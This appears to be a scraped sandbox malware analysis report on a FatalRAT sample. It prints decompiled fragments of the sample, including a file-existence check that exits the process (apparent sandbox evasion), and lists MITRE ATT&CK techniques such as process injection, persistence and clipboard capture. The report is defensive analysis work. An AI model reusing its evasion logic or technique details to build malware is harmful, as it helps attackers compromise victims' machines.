Opcode ID: fc29adba10e94e6172bba8d0a41134e7306872d78bd8cbea26b29128700478a1
Instruction ID: 6a87c862f2ce059a1fc4f458892c69c6a8742df74896d89657497d30de082562
Opcode Fuzzy Hash: fc29adba10e94e6172bba8d0a41134e7306872d78bd8cbea26b29128700478a1
Instruction Fuzzy Hash: D5114C72901629FFEB01CF55CC84BCE77A8FF057A1F208426F91996191D7B0AE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10002506, Relevance: 4.5, APIs: 3, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E10002506() {
				char _v24;
				int _t10;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				E10001E15( &_v24, strlen( &_v24), 0xd);
				_t10 = PathFileExistsA( &_v24); // executed
				if(_t10 != 0) {
					ExitProcess(0);
				}
				return _t10;
			}

0x10002516
0x10002517
0x10002518
0x10002519
0x10002520
0x1000252e
0x1000253a
0x10002544
0x10002548
0x10002548
0x1000254f

APIs

strlen.MSVCRT ref: 10002522
PathFileExistsA.KERNELBASE(?,?,?,?,?,?,100029D2,00000000,1000BDED), ref: 1000253A
ExitProcess.KERNEL32 ref: 10002548

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ExistsExitFilePathProcessstrlen
String ID:
API String ID: 2516096012-0
Opcode ID: 053be7b7db3717b2dba986a54f621b1e5806f712669b46f8ad205c3add93a138
Instruction ID: d3b4025932ad11825c4c20c45e558ba2945908530422f772f938d1b65ea4f7c7
Opcode Fuzzy Hash: 053be7b7db3717b2dba986a54f621b1e5806f712669b46f8ad205c3add93a138
Instruction Fuzzy Hash: 41E06572900619A7D701EBE4DD4AEDFB7ADEF45651F500022FD05F6090E7A0A70987F1

Uniqueness

Uniqueness Score: -1.00%

Function 10001030, Relevance: 1.3, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001030(void* __ecx, void* __eflags, void* __fp0, void* _a4, int _a8) {
				void* _t6;
				void* _t8;
				int _t14;
				void* _t15;

				_t15 = __ecx;
				_t6 = E1000112E(__ecx);
				_t14 = _a8;
				_t8 = E1000113E(__ecx, __fp0, _t6 + _t14); // executed
				if(_t8 != 0xffffffff) {
					memcpy( *(_t15 + 8), _a4, _t14);
					 *(_t15 + 8) =  *(_t15 + 8) + _t14;
					return _t14;
				}
				return 0;
			}

0x10001035
0x10001037
0x1000103c
0x10001044
0x1000104c
0x10001059
0x10001061
0x00000000
0x10001064
0x00000000

APIs

memcpy.MSVCRT ref: 10001059

Memory Dump Source

Source File: 00000003.00000002.465903001.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465895100.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.465954492.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.465983464.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d317d7616c8d774c7cb3944c186f12b0bc4d4c813844074f67a6631a0cee690c
Instruction ID: 0a4397ef192c42541b28af5f825f4623d48b5f4c80f2c0cc13de85527de66cb4
Opcode Fuzzy Hash: d317d7616c8d774c7cb3944c186f12b0bc4d4c813844074f67a6631a0cee690c
Instruction Fuzzy Hash: 2DE0863AB00244A7CA30956BEC01CCBBB9EDFD12F07144526FA68C6265D972E95496A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FatalRAT

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Operating System Destruction:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Function 00403140, Relevance: 64.9, APIs: 6, Strings: 31, Instructions: 137
libraryloadermemoryCOMMON

Function 00403BC0, Relevance: 52.6, APIs: 10, Strings: 20, Instructions: 142
libraryloaderCOMMON

Function 004165BB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106
filestringCOMMON

Function 00402490, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
fileCOMMON

Function 004038B0, Relevance: 87.7, APIs: 10, Strings: 40, Instructions: 154
libraryloaderCOMMON

Function 00403570, Relevance: 82.5, APIs: 9, Strings: 38, Instructions: 208
COMMON

Function 00402FC0, Relevance: 40.4, APIs: 4, Strings: 19, Instructions: 112
librarymemoryloaderCOMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre